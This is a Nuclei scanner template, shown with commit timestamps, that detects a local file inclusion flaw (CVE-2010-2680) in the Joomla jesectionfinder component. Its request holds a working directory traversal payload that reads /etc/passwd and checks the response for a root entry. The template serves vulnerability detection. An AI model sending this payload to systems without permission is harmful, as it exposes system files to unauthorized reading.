my-nuclei-templates/CVE-2010-2680.yaml

35 lines
1.1 KiB
YAML
Raw Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
2021-11-09 22:49:13 +00:00
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
2022-06-18 08:05:25 +00:00
- http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
- http://web.archive.org/web/20210121201853/https://www.securityfocus.com/bid/41163/
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2680
2021-11-09 22:49:13 +00:00
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-11-09 22:49:13 +00:00
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/17